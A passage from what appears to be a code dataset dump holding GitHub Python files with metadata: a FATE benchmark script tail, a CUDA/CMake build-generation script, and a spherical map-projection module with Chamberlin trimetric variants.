parser.add_argument(\"-config\", type=str,\n help=\"config file\")\n parser.add_argument(\"-param\", type=str,\n help=\"config file for params\")\n args = parser.parse_args()\n if args.config is not None:\n main(args.config, args.param)\n else:\n main()\n", "repo_name": "FederatedAI/FATE", "sub_path": "examples/benchmark_quality/hetero_nn_pytorch/local-hetero_nn.py", "file_name": "local-hetero_nn.py", "file_ext": "py", "file_size_in_byte": 4792, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 5296, "dataset": "github-code", "pt": "53", "api": [{"api_name": "pipeline.fate_torch_hook", "line_number": 18, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 21, "usage_type": "attribute"}, {"api_name": "torch.nn.Sequential", "line_number": 26, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 26, "usage_type": "attribute"}, {"api_name": "torch.nn.Linear", "line_number": 27, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 27, "usage_type": "name"}, {"api_name": "torch.nn.ReLU", "line_number": 28, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 28, "usage_type": "name"}, {"api_name": "torch.nn.Linear", "line_number": 29, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 29, "usage_type": "name"}, {"api_name": "torch.nn.ReLU", "line_number": 30, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 30, "usage_type": "name"}, {"api_name": "torch.nn.Sequential", "line_number": 33, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 33, "usage_type": "attribute"}, {"api_name": "torch.nn.Linear", "line_number": 34, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 34, "usage_type": "name"}, {"api_name": "torch.nn.ReLU", "line_number": 35, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 35, "usage_type": "name"}, {"api_name": "torch.nn.Linear", "line_number": 36, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 36, "usage_type": "name"}, {"api_name": "torch.nn.ReLU", "line_number": 37, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 37, "usage_type": "name"}, {"api_name": "torch.nn.Linear", "line_number": 40, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 40, "usage_type": "attribute"}, {"api_name": "torch.nn.Sequential", "line_number": 42, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 42, "usage_type": "attribute"}, {"api_name": "torch.nn.Linear", "line_number": 43, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 43, "usage_type": "name"}, {"api_name": "torch.nn.Sigmoid", "line_number": 44, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 44, "usage_type": "name"}, {"api_name": "torch.float", "line_number": 48, "usage_type": "attribute"}, {"api_name": "torch.utils.data.Dataset", "line_number": 59, "usage_type": "name"}, {"api_name": "pipeline.utils.tools.JobConfig.load_from_file", "line_number": 82, "usage_type": "call"}, {"api_name": "pipeline.utils.tools.JobConfig", "line_number": 82, "usage_type": "name"}, {"api_name": "pipeline.utils.tools.JobConfig.load_from_file", "line_number": 87, "usage_type": "call"}, {"api_name": "pipeline.utils.tools.JobConfig", "line_number": 87, "usage_type": "name"}, {"api_name": "pandas.read_csv", "line_number": 93, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 93, "usage_type": "call"}, {"api_name": "os.path", "line_number": 93, "usage_type": "attribute"}, {"api_name": "pandas.read_csv", "line_number": 94, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 94, "usage_type": "call"}, {"api_name": "os.path", "line_number": 94, "usage_type": "attribute"}, {"api_name": "torch.Tensor", "line_number": 101, "usage_type": "call"}, {"api_name": "torch.Tensor", "line_number": 102, "usage_type": "call"}, {"api_name": "torch.Tensor", "line_number": 103, "usage_type": "call"}, {"api_name": "torch.utils.data.DataLoader", "line_number": 106, "usage_type": "call"}, {"api_name": "torch.optim.Adam", "line_number": 107, "usage_type": "call"}, {"api_name": "torch.optim", "line_number": 107, "usage_type": "attribute"}, {"api_name": "torch.nn.BCELoss", "line_number": 110, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 110, "usage_type": "attribute"}, {"api_name": "tqdm.tqdm", "line_number": 112, "usage_type": "call"}, {"api_name": "torch.float32", "line_number": 117, "usage_type": "attribute"}, {"api_name": "sklearn.metrics.roc_auc_score", "line_number": 125, "usage_type": "call"}, {"api_name": "sklearn.metrics", "line_number": 125, "usage_type": "name"}, {"api_name": "numpy.argmax", "line_number": 128, "usage_type": "call"}, {"api_name": "sklearn.metrics.accuracy_score", "line_number": 130, "usage_type": "call"}, {"api_name": "sklearn.metrics", "line_number": 130, "usage_type": "name"}, {"api_name": "argparse.ArgumentParser", "line_number": 141, "usage_type": "call"}]} +{"seq_id": "71521286247", "text": "#!/usr/bin/env python\n\nimport json\nimport subprocess\nimport os\nimport re\nimport shutil\nimport textwrap\n\n# this variable is assigned by cmake during build\nGPU_MPI_BUILD_TYPE = \"@CMAKE_BUILD_TYPE@\"\n\n\ndef is_inside(path, directory):\n path = os.path.realpath(path)\n directory = os.path.realpath(directory)\n return directory == os.path.commonpath([directory, path])\n\ndef escape_name(name):\n return name.replace('/', '_').replace('.', '_')\n\n\nheader_pattern = re.compile('#include [<\"](.*)[\">]')\n\ndef find_headers(path_to_file, include_dirs):\n \"\"\" Looks for header inside include_dirs and header local directory.\n Returns list of detected headers.\n \"\"\"\n\n file_dir = os.path.dirname(os.path.realpath(__file__))\n\n # we should search relative headers in current dir\n all_include_dirs = [file_dir] + include_dirs\n\n detected_headers = []\n with open(path_to_file, 'r') as f:\n for match in header_pattern.finditer(f.read()):\n header_name = match.group(1)\n\n # search relative headers in include dirs and detect their absolute location\n absolute_header = None\n if not os.path.isabs(header_name):\n for include_dir in all_include_dirs:\n header_candidate = os.path.join(include_dir, header_name)\n if os.path.exists(header_candidate):\n absolute_header = os.path.realpath(header_candidate)\n break\n\n # if nothing is find, then it is system header that should be skipped\n if absolute_header is None:\n continue\n\n detected_headers.append(absolute_header)\n\n all_headers = detected_headers\n \n # for each detected header we need to look for other includes recurrently\n for header in detected_headers:\n all_headers += find_headers(header, include_dirs)\n\n # return each header once\n all_headers = list(set(all_headers))\n\n return all_headers\n\ndef get_includes(absolute_path, compile_commands):\n for entry in compile_commands:\n if entry['absolute_source_path'] == absolute_path:\n return entry['project_include_dirs']\n raise Exception(f'Entry {absolute_path} not found in compilation database')\n\ndef get_definitions(absolute_path, compile_commands):\n for entry in compile_commands:\n if entry['absolute_source_path'] == absolute_path:\n return entry['definitions']\n raise Exception(f'Entry {absolute_path} not found in compilation database')\n\ndef run_build():\n os.makedirs('./gpumpi_build', exist_ok=True)\n process = subprocess.Popen(f\"cmake .. -DCMAKE_BUILD_TYPE={GPU_MPI_BUILD_TYPE}\".split(), cwd='./gpumpi_build')\n process.wait()\n process = subprocess.Popen(\"cmake --build ./gpumpi_build\".split())\n process.wait()\n\nif __name__ == '__main__':\n\n script_dir = os.path.dirname(os.path.realpath(__file__))\n project_dir = os.getcwd()\n\n def run_cmd(command, directory):\n process = subprocess.Popen(command, cwd=directory)\n process.wait()\n if process.returncode != 0:\n raise Exception(\"failed\")\n\n with open('compile_commands.json', 'r') as f:\n compile_commands = json.load(f)\n\n\n all_sources = []\n all_headers = []\n\n for entry in compile_commands:\n # detect include directories inside project dir for each target\n entry['project_include_dirs'] = []\n for arg in entry['arguments']:\n # detect only include directories\n if not arg.startswith('-I'):\n continue\n\n include_dir = arg[2:]\n\n # make all paths absolute\n if not os.path.isabs(include_dir):\n include_dir = os.path.realpath(os.path.join(entry['directory'], include_dir))\n\n # skip includes outside of project directory\n if not is_inside(include_dir, project_dir):\n continue \n\n entry['project_include_dirs'].append(include_dir)\n\n # detect definitions\n entry['definitions'] = []\n for arg in entry['arguments']:\n if arg.startswith('-D'):\n entry['definitions'].append(arg[2:])\n\n\n # detect absolute path to source files\n entry['absolute_source_path'] = os.path.realpath(os.path.join(entry['directory'], entry['file']))\n\n # detect list of headers inside project directory that are used from source files \n all_headers += find_headers(entry['absolute_source_path'], entry['project_include_dirs'])\n all_sources += [entry['absolute_source_path']]\n\n # mention sources and headers only once\n all_sources = list(set(all_sources))\n all_headers = list(set(all_headers))\n\n # create \".cuh\" for very simple headers, because libtooling skips them\n for header in all_headers:\n expected_name = header + '.cuh'\n if not os.path.exists(expected_name):\n shutil.copyfile(header, expected_name)\n\n # add to each include in '.cu' or '.cuh' file additional '.cuh' suffix\n for file_name in (*all_sources, *all_headers):\n\n if file_name in all_sources:\n cu_file_name = file_name + '.cu'\n else:\n cu_file_name = file_name + '.cuh'\n\n with open(cu_file_name, 'r') as in_file: \n text = re.sub('#include ([<\"])(.*)([\">])', '#include \\g<1>\\g<2>.cuh\\g<3>', in_file.read())\n text = re.sub('\\.cuh\\.cuh', '.cuh', text) # fixes double modification\n with open(cu_file_name, 'w') as out_file:\n out_file.write(text)\n\n\n # for each source file detect if __gpu_main present. If yes, it will define executable,\n # otherwise, it will define library.\n executables = []\n libraries = []\n for file_name in all_sources:\n cu_file_name = file_name + '.cu'\n with open(cu_file_name, 'r') as f:\n if '__gpu_main' in f.read():\n executables.append(file_name)\n else:\n libraries.append(file_name)\n\n cmakelists = textwrap.dedent(f\"\"\"\n cmake_minimum_required(VERSION 3.12)\n project(examples LANGUAGES C CXX CUDA)\n\n set(CMAKE_CUDA_FLAGS_DEBUG \"${CMAKE_CUDA_FLAGS_DEBUG} -G\") \n\n # specify cuda architectures for newer cmake\n set(CMAKE_CUDA_ARCHITECTURES 60 61 70)\n\n # specify cuda architectures for older cmake\n set(CMAKE_CUDA_FLAGS\n \"${CMAKE_CUDA_FLAGS} \\\n -gencode arch=compute_60,code=sm_60 \\\n -gencode arch=compute_61,code=sm_61 \\\n -gencode arch=compute_70,code=sm_70\")\n\n include({script_dir}/../gpu_libs-exports.cmake)\n\n set(CMAKE_CUDA_SEPARABLE_COMPILATION ON)\n \"\"\")\n\n for f in all_sources:\n includes = get_includes(f, compile_commands)\n defines = get_definitions(f, compile_commands)\n escaped_name = escape_name(f)\n target_type = 'executable' if f in executables else 'library'\n\n cmakelists += textwrap.dedent(f\"\"\"\n add_{target_type}(target_{escaped_name} {f}.cu)\n target_link_libraries(target_{escaped_name} PRIVATE gpu_libs)\n \"\"\")\n\n if includes:\n includes_str = \" \".join(includes)\n cmakelists += textwrap.dedent(f\"\"\"\n target_include_directories(target_{escaped_name} PRIVATE {includes_str})\n \"\"\")\n\n for lib in libraries:\n for exe in executables:\n escaped_lib_name = escape_name(lib)\n escaped_exe_name = escape_name(exe)\n cmakelists += textwrap.dedent(f\"\"\"\n target_link_libraries(target_{escaped_exe_name} PRIVATE target_{escaped_lib_name})\n \"\"\")\n\n with open('CMakeLists.txt', 'w') as f:\n f.write(cmakelists)\n\n run_build()\n\n", "repo_name": "maerhart/dphpc-project", "sub_path": "scripts/build_on_gpu.py", "file_name": "build_on_gpu.py", "file_ext": "py", "file_size_in_byte": 7719, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "os.path.realpath", "line_number": 15, "usage_type": "call"}, {"api_name": "os.path", "line_number": 15, "usage_type": "attribute"}, {"api_name": "os.path.realpath", "line_number": 16, "usage_type": "call"}, {"api_name": "os.path", "line_number": 16, "usage_type": "attribute"}, {"api_name": "os.path.commonpath", "line_number": 17, "usage_type": "call"}, {"api_name": "os.path", "line_number": 17, "usage_type": "attribute"}, {"api_name": "re.compile", "line_number": 23, "usage_type": "call"}, {"api_name": "os.path.dirname", "line_number": 30, "usage_type": "call"}, {"api_name": "os.path", "line_number": 30, "usage_type": "attribute"}, {"api_name": "os.path.realpath", "line_number": 30, "usage_type": "call"}, {"api_name": "os.path.isabs", "line_number": 42, "usage_type": "call"}, {"api_name": "os.path", "line_number": 42, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 44, "usage_type": "call"}, {"api_name": "os.path", "line_number": 44, "usage_type": "attribute"}, {"api_name": "os.path.exists", "line_number": 45, "usage_type": "call"}, {"api_name": "os.path", "line_number": 45, "usage_type": "attribute"}, {"api_name": "os.path.realpath", "line_number": 46, "usage_type": "call"}, {"api_name": "os.path", "line_number": 46, "usage_type": "attribute"}, {"api_name": "os.makedirs", "line_number": 79, "usage_type": "call"}, {"api_name": "subprocess.Popen", "line_number": 80, "usage_type": "call"}, {"api_name": "subprocess.Popen", "line_number": 82, "usage_type": "call"}, {"api_name": "os.path.dirname", "line_number": 87, "usage_type": "call"}, {"api_name": "os.path", "line_number": 87, "usage_type": "attribute"}, {"api_name": "os.path.realpath", "line_number": 87, "usage_type": "call"}, {"api_name": "os.getcwd", "line_number": 88, "usage_type": "call"}, {"api_name": "subprocess.Popen", "line_number": 91, "usage_type": "call"}, {"api_name": "json.load", "line_number": 97, "usage_type": "call"}, {"api_name": "os.path.isabs", "line_number": 114, "usage_type": "call"}, {"api_name": "os.path", "line_number": 114, "usage_type": "attribute"}, {"api_name": "os.path.realpath", "line_number": 115, "usage_type": "call"}, {"api_name": "os.path", "line_number": 115, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 115, "usage_type": "call"}, {"api_name": "os.path.realpath", "line_number": 131, "usage_type": "call"}, {"api_name": "os.path", "line_number": 131, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 131, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 144, "usage_type": "call"}, {"api_name": "os.path", "line_number": 144, "usage_type": "attribute"}, {"api_name": "shutil.copyfile", "line_number": 145, "usage_type": "call"}, {"api_name": "re.sub", "line_number": 156, "usage_type": "call"}, {"api_name": "re.sub", "line_number": 157, "usage_type": "call"}, {"api_name": "textwrap.dedent", "line_number": 174, "usage_type": "call"}, {"api_name": "textwrap.dedent", "line_number": 201, "usage_type": "call"}, {"api_name": "textwrap.dedent", "line_number": 208, "usage_type": "call"}, {"api_name": "textwrap.dedent", "line_number": 216, "usage_type": "call"}]} +{"seq_id": "40325099948", "text": "# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Oct 31 13:38:02 2019\n\n@author: brsr\n\"\"\"\nimport pyproj\nimport warnings\nimport numpy as np\nfrom abc import ABC\nfrom scipy.optimize import minimize\n\nfrom .transformations import Transformation, UnitVector\nfrom .helper import sqrt, antipode_v, central_angle, trigivenlengths, triangle_solid_angle\n\n#TODO:\n#vectorize all the things, or convert to \n#make a better implementation of conformal\n\n#arange3 = np.arange(3)\n#FIRST AXIS IS SPATIAL\n\n_unitsphgeod = pyproj.Geod(a=1, b=1)\n\nclass Double(Transformation):\n \"\"\"Linear combination of two projections\n \n Note that the inverse transformation is not the inverse of the forward\n transformation: it is the linear combination of the inverse \n transformations.\n \"\"\"\n def __init__(self, proj1, proj2, t=0.5):\n subproj = [proj1, proj2]\n super().__init__()\n self.subproj = subproj\n self.t = t\n\n def transform(self, lon, lat):\n subproj = self.subproj\n t = self.t\n return ((1 - t)*subproj[0].transform(lon, lat)\n + t*subproj[1].transform(lon, lat))\n\n def inv_transform(self, x, y):\n subproj = self.subproj\n t = self.t\n return ((1 - t)*subproj[0].inv_transform(x, y)\n + t*subproj[1].inv_transform(x, y))\n\nclass Multiple(Transformation):\n \"\"\"Linear combination of several projections\n \n Note that the inverse transformation is not the inverse of the forward\n transformation: it is the linear combination of the inverse \n transformations.\n \"\"\"\n def __init__(self, subproj, t):\n super().__init__()\n assert len(subproj) == len(t)\n self.subproj = subproj\n self.t = t\n\n def transform(self, lon, lat):\n rx = 0\n for proj, t in zip(self.subproj, self.t):\n rx += t * proj.transform(lon, lat)\n return rx\n\n def inv_transform(self, x, y):\n rx = 0\n for proj, t in zip(self.subproj, self.t):\n rx += t * proj.inv_transform(x, y)\n return rx\n \nclass CtrlPtsProjection(Transformation, ABC):\n \"\"\"Subclass for any map projection that uses (2 or more) control points.\"\"\"\n def __init__(self, ctrlpts, geod = _unitsphgeod):\n \"\"\"Parameters:\n ctrlpts: 2x3 or 2x4 Numpy array, latitude and longitude of\n each control point\n geod= a pyproj.Geod object. For a unit sphere use\n pyproj.Geod(a=1,b=1)\n \"\"\"\n n = ctrlpts.shape[1]\n if self.nctrlpts != n:\n raise ValueError(\n 'ctrlpts has wrong number of points for this projection')\n self.geod = geod\n #it's possible to get a geod where this would give the wrong answer,\n #but I think it would have to be really weird\n area, _ = geod.polygon_area_perimeter([0,120,-120],[0,0,0])\n self.totalarea = 2*area\n\n self.ctrlpts = ctrlpts\n ctrlpts_v = UnitVector.transform_v(ctrlpts)\n self.ctrlpts_v = ctrlpts_v\n center_v = ctrlpts_v.sum(axis=1)\n self.center_v = center_v / np.linalg.norm(center_v)\n self.center = UnitVector.invtransform_v(center_v)\n antipode = antipode_v(ctrlpts)\n self.antipode = antipode\n self.antipode_v = UnitVector.transform_v(antipode)\n self.sa = 0\n if self.nctrlpts > 2:\n faz, baz, sides = self.geod.inv(ctrlpts[0], ctrlpts[1],\n np.roll(ctrlpts[0], -1),\n np.roll(ctrlpts[1], -1))\n self.sides = sides\n self.faz = faz\n self.baz = baz\n self.ctrl_angles = (faz - np.roll(baz, 1))%360\n area, _ = geod.polygon_area_perimeter(*ctrlpts)\n self.area = area\n self.ca = central_angle(ctrlpts_v,\n np.roll(ctrlpts_v, -1, axis=1))\n for i in range(1, self.nctrlpts-1):\n self.sa += triangle_solid_angle(ctrlpts_v[..., 0],\n ctrlpts_v[..., i],\n ctrlpts_v[..., i+1])\n\n self.edgenormals = np.cross(ctrlpts_v,\n np.roll(ctrlpts_v, -1, axis=1), axis=0)\n\n else:\n faz, baz, sides = self.geod.inv(ctrlpts[0,0], ctrlpts[1,0],\n ctrlpts[0,1], ctrlpts[1,1])\n self.sides = sides\n self.faz = faz\n self.baz = baz\n self.area = 0\n self.ca = central_angle(ctrlpts_v[..., 0], ctrlpts_v[..., 1])\n self.edgenormals = np.cross(ctrlpts_v[..., 0], ctrlpts_v[..., 1])\n\n self.cosca = np.cos(self.ca)\n self.sinca = np.sin(self.ca)\n\n if self.sa < 0:\n warnings.warn('control polygon is in negative orientation, '\n + 'may cause unusual results')\n\n if self.nctrlpts == 4:\n ctrlpts_v = self.ctrlpts_v\n v0 = ctrlpts_v[..., 0]\n v1 = ctrlpts_v[..., 1]\n v2 = ctrlpts_v[..., 2]\n v3 = ctrlpts_v[..., 3]\n poip1 = np.cross(np.cross(v0, v1), np.cross(v3, v2))\n poip2 = np.cross(np.cross(v0, v3), np.cross(v1, v2))\n poip = np.stack([[poip1, -poip1],\n [poip2, -poip2]]).transpose(2,0,1)\n poip = poip / np.linalg.norm(poip, axis=0)\n self.poi_v = poip\n self.poi = UnitVector.invtransform_v(poip)\n self.crossx = np.cross(ctrlpts_v,\n np.roll(ctrlpts_v, -2, axis=1),\n axis=0)[..., :2]\n\n def orienttgtpts(self, tgtpts, N = (0, 90)):\n \"\"\"Orient target points so that line from 0 to the projection of N\n points up. Will fail if map projection doesn't define tgtpts.\"\"\"\n pN = self.transform(*N)\n if np.allclose(pN, [0,0]):\n raise ValueError('projection of N too close to 0')\n angle = np.arctan2(pN[0],pN[1])\n rotm = np.array([[np.cos(angle), -np.sin(angle)],\n [np.sin(angle), np.cos(angle)]])\n result = rotm @ tgtpts\n self.tgtpts = result\n\n def lune(self, lon, lat):\n \"\"\"\n Determine which lune a point or series of points lies in.\n Lune 0 is the lune with vertex at the centroid and edges passing through\n control points 0 and 1. Lune 1 is the same using control pts 1 and 2,\n and Lune 2 uses control pts 2 and 0.\n \"\"\"\n #inexact on ellipsoids but close enough\n testpt = UnitVector.transform(lon, lat)\n testpt_v = testpt.reshape(3,-1)\n ctrlpts_v = self.ctrlpts_v\n center_v = self.center_v\n cx = np.cross(center_v, ctrlpts_v, axis=0)\n sk = cx.T @ testpt_v\n sg = sk >= 0\n ind = sg & ~np.roll(sg, shift=-1, axis=0)\n result = np.argmax(ind, axis=0)\n return result.reshape(testpt.shape[1:])\n\nclass DoubleCtrlPts(CtrlPtsProjection):\n \"\"\"Linear combination of two projections\n \n Note that the inverse transformation is not the inverse of the forward\n transformation: it is the linear combination of the inverse \n transformations.\n \"\"\"\n def __init__(self, ctrlpts, proj1, proj2, t=0.5):\n subproj = [proj1(ctrlpts), proj2(ctrlpts)]\n self.nctrlpts = subproj[0].nctrlpts\n if self.nctrlpts != subproj[1].nctrlpts:\n raise ValueError('proj1 and proj2 have different # of ctrlpts')\n super().__init__(ctrlpts)\n self.subproj = subproj\n self.t = t\n\n def transform(self, lon, lat):\n subproj = self.subproj\n t = self.t\n return ((1 - t)*subproj[0].transform(lon, lat)\n + t*subproj[1].transform(lon, lat))\n\n def inv_transform(self, lon, lat):\n subproj = self.subproj\n t = self.t\n return ((1 - t)*subproj[0].transform(lon, lat)\n + t*subproj[1].transform(lon, lat))\n\nclass KProjection(CtrlPtsProjection):\n exact = True\n k = 1\n def extend(self, v):\n normal = self.center_v\n k = self.k\n n = np.linalg.norm(v, axis=0, keepdims=True)\n if self.exact:\n vdotc = np.tensordot(v, normal, axes=(0, 0))[np.newaxis]\n vdotv = n**2\n p = -vdotc + sqrt(1 + vdotc**2 - vdotv)\n else:\n p = 1 - n\n #print(v.shape, p.shape, normal.shape)\n return v + k*p*normal[..., np.newaxis]\n \n def transform(self, *args, **kwargs):\n return NotImplemented\n \n#%% not-polygonal projections\nclass ChambTrimetric(CtrlPtsProjection):\n \"\"\"Chamberlin trimetric projection\"\"\"\n #FIXME this implementation fails for control triangles with \n #high aspect ratios\n nctrlpts = 3\n\n def __init__(self, ctrlpts, geod=_unitsphgeod):\n super().__init__(ctrlpts, geod)\n self.tgtpts = trigivenlengths(self.sides)\n try:\n self.orienttgtpts(self.tgtpts)\n except ValueError:\n pass\n\n def transform(self, x, y, **kwargs):\n if hasattr(x, '__iter__'):\n raise TypeError()\n tgtpts = self.tgtpts\n f, b, rad = self.geod.inv(self.ctrlpts[0], self.ctrlpts[1],\n x*np.ones(3), y*np.ones(3))\n faz = self.faz\n raz1 = (faz - f) % 360\n radsq = np.array(rad).squeeze()**2\n ctgt = tgtpts.T.copy().view(dtype=complex).squeeze()\n a = np.roll(ctgt, -1) - ctgt\n b = ctgt\n l = abs(a)\n lsq = l**2\n rsq = radsq/lsq\n ssq = np.roll(radsq, -1, axis=-1)/lsq\n x0 = (rsq - ssq + 1)/2\n y0 = sqrt(-rsq**2 + 2*rsq*(ssq + 1) - (ssq - 1)**2)/2\n y0[np.isnan(y0)] = 0\n y = np.where(raz1 > 180, -y0, y0)\n z0 = x0 +1j*y\n pts = (a * z0 + b)\n result = np.mean(pts)\n return result.real, result.imag\n\n def invtransform(self, *args, **kwargs):\n return NotImplemented\n\nclass LstSqTrimetric(ChambTrimetric):\n \"\"\"Least-squares variation of the Chamberlin trimetric projection\"\"\"\n def transform(self, x, y, **kwargs):\n init = super().transform(x, y)\n tgtpts = self.tgtpts\n f, b, rad = self.geod.inv(self.ctrlpts[0], self.ctrlpts[1],\n x*np.ones(3), y*np.ones(3))\n def objective(v):\n x = v[0]\n y = v[1]\n a = tgtpts[0]\n b = tgtpts[1]\n xma = x-a\n ymb = y-b\n dist = np.sqrt(xma**2 + ymb**2)\n result = np.sum((dist - rad)**2 )\n f = 1 - rad/dist\n f[rad <= 0] = 1\n jac = 2*np.array([np.sum(xma*f), np.sum(ymb*f)])\n return result, jac\n res = minimize(objective, init, jac=True,\n method = 'BFGS')\n return res.x\n\nclass LinearTrimetric(CtrlPtsProjection):\n \"\"\"The linear variation of the Chamberlin Trimetric projection.\"\"\"\n nctrlpts = 3\n matrix1 = np.array([[0,-1],\n [1,0]])\n matrix2 = np.array([[0, -1, 1],\n [1, 0, -1],\n [-1, 1, 0]])\n matrixinv1 = np.array([[-2,1,1],\n [1,-2,1],\n [1,1,-2]])*2/3\n\n def __init__(self, ctrlpts, geod=_unitsphgeod):\n \"\"\"Parameters:\n ctrlpts: 2x3 Numpy array, latitude and longitude of each control point\n geod= a pyproj.Geod object. For a unit sphere use\n pyproj.Geod(a=1,b=1).\n \"\"\"\n super().__init__(ctrlpts, geod)\n self.radius = ((geod.a**(3/2) + geod.b**(3/2))/2)**(2/3)\n self.tgtpts = trigivenlengths(self.sides)\n self.setmat()\n # try:\n # self.orienttgtpts(self.tgtpts)\n # self.setmat()\n # except ValueError:\n # pass\n\n vctrl = self.ctrlpts_v\n self.invctrlvector = np.linalg.pinv(vctrl)\n self.invperpmatrix = self.invctrlvector @ self.invctrlvector.T\n cosrthmin = 1 / np.sqrt(self.invperpmatrix.sum())\n self.hminall = np.arccos(cosrthmin)**2\n\n def setmat(self, tgtpts=None):\n \"\"\"Set matrices that use tgtpts\"\"\"\n if tgtpts is None:\n tgtpts = self.tgtpts\n else:\n self.tgtpts = tgtpts\n tgtde = np.linalg.det(np.concatenate([tgtpts, np.ones((1,3))], axis=0))\n self.m = self.matrix1 @ tgtpts @ self.matrix2 /(2*tgtde)\n self.minv = self.matrixinv1 @ tgtpts.T\n\n def transform_v(self, pts):\n rpts = pts.reshape((2,-1)).T\n rad = []\n for x,y in rpts:\n f, b, radi = self.geod.inv(x*np.ones(3), y*np.ones(3),\n self.ctrlpts[0], self.ctrlpts[1])\n rad.append(radi)\n shape = list(pts.shape)\n shape[0] = 3\n rad = np.array(rad).T\n radsq = np.array(rad)**2\n result = self.m @ radsq\n return result.reshape(pts.shape)\n\n def invtransform_v(self, pts, n=20, stop=1E-8):\n if not self.geod.sphere:\n warnings.warn('inverse transform is approximate on ellipsoids')\n rpts = pts.reshape((2,-1))\n k = self.minv @ rpts/self.radius**2\n hmin = -np.min(k, axis=0)\n print('k: ', k)\n #hmax = np.pi**2-np.max(k, axis=0)\n hminall = self.hminall\n h = np.where(hmin < hminall, hminall, hmin)\n print('h: ', h)\n for i in range(n):\n rsq = (k + h)\n #pos = rsq > 0\n neg = rsq < 0\n zer = rsq == 0\n c = np.where(neg, np.cosh(np.sqrt(-rsq)), np.cos(np.sqrt(rsq)))\n b = np.where(neg, np.sinh(np.sqrt(-rsq)),\n np.sin(np.sqrt(rsq)))/np.sqrt(np.abs(rsq))\n b[zer] = 1\n f = np.einsum('i...,ij,j...', c, self.invperpmatrix, c) - 1\n fprime = np.einsum('i...,ij,j...', c, self.invperpmatrix, b)\n delta = f/fprime\n h += delta\n print('delta:', delta)\n print('h: ', h)\n if np.max(np.abs(delta)) < stop:\n break\n #h = np.clip(h, hmin, hmax)\n rsq = np.clip(k + h, 0, np.pi**2)\n c = np.cos(np.sqrt(rsq))\n vector = self.invctrlvector.T @ c\n print(c)\n print(vector)\n return UnitVector.invtransform_v(vector).reshape(pts.shape)\n\n def nmforplot(self, pts, n=100):\n rpts = pts.reshape((2,-1))\n k = self.minv @ rpts/self.radius**2\n hmin = -np.min(k, axis=0)\n hmax = np.pi**2-np.max(k, axis=0)\n h = np.linspace(hmin,hmax,100).T\n rsq = (k[..., np.newaxis] + h)\n c = np.cos(np.sqrt(rsq))\n nm = np.einsum('i...,ij,j...', c, self.invperpmatrix, c)\n\n return h, nm\n\n\n#%%\nif __name__ == \"__main__\":\n import doctest\n sup = np.testing.suppress_warnings()\n sup.filter(RuntimeWarning)\n options = doctest.NORMALIZE_WHITESPACE | doctest.ELLIPSIS\n with sup:\n doctest.testmod(optionflags = options)\n", "repo_name": "brsr/mapstuff", "sub_path": "mapstuff/projections.py", "file_name": "projections.py", "file_ext": "py", "file_size_in_byte": 14925, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 3, "dataset": "github-code", "pt": "53", "api": [{"api_name": "pyproj.Geod", "line_number": 23, "usage_type": "call"}, {"api_name": "transformations.Transformation", "line_number": 25, "usage_type": "name"}, {"api_name": "transformations.Transformation", "line_number": 50, "usage_type": "name"}, {"api_name": "transformations.Transformation", "line_number": 75, "usage_type": "name"}, {"api_name": "abc.ABC", "line_number": 75, "usage_type": "name"}, {"api_name": "transformations.UnitVector.transform_v", "line_number": 95, "usage_type": "call"}, {"api_name": "transformations.UnitVector", "line_number": 95, "usage_type": "name"}, {"api_name": "numpy.linalg.norm", "line_number": 98, "usage_type": "call"}, {"api_name": "numpy.linalg", "line_number": 98, "usage_type": "attribute"}, {"api_name": "transformations.UnitVector.invtransform_v", "line_number": 99, "usage_type": "call"}, {"api_name": "transformations.UnitVector", "line_number": 99, "usage_type": "name"}, {"api_name": "helper.antipode_v", "line_number": 100, "usage_type": "call"}, {"api_name": "transformations.UnitVector.transform_v", "line_number": 102, "usage_type": "call"}, {"api_name": "transformations.UnitVector", "line_number": 102, "usage_type": "name"}, {"api_name": "numpy.roll", "line_number": 106, "usage_type": "call"}, {"api_name": "numpy.roll", "line_number": 107, "usage_type": "call"}, {"api_name": "numpy.roll", "line_number": 111, "usage_type": "call"}, {"api_name": "helper.central_angle", "line_number": 114, "usage_type": "call"}, {"api_name": "numpy.roll", "line_number": 115, "usage_type": "call"}, {"api_name": "helper.triangle_solid_angle", "line_number": 117, "usage_type": "call"}, {"api_name": "numpy.cross", "line_number": 121, "usage_type": "call"}, {"api_name": "numpy.roll", "line_number": 122, "usage_type": "call"}, {"api_name": "helper.central_angle", "line_number": 131, "usage_type": "call"}, {"api_name": "numpy.cross", "line_number": 132, "usage_type": "call"}, {"api_name": "numpy.cos", "line_number": 134, "usage_type": "call"}, {"api_name": "numpy.sin", "line_number": 135, "usage_type": "call"}, {"api_name": "warnings.warn", "line_number": 138, "usage_type": "call"}, {"api_name": "numpy.cross", "line_number": 147, "usage_type": "call"}, {"api_name": "numpy.cross", "line_number": 148, "usage_type": "call"}, {"api_name": "numpy.stack", "line_number": 149, "usage_type": "call"}, {"api_name": "numpy.linalg.norm", "line_number": 151, "usage_type": "call"}, {"api_name": "numpy.linalg", "line_number": 151, "usage_type": "attribute"}, {"api_name": "transformations.UnitVector.invtransform_v", "line_number": 153, "usage_type": 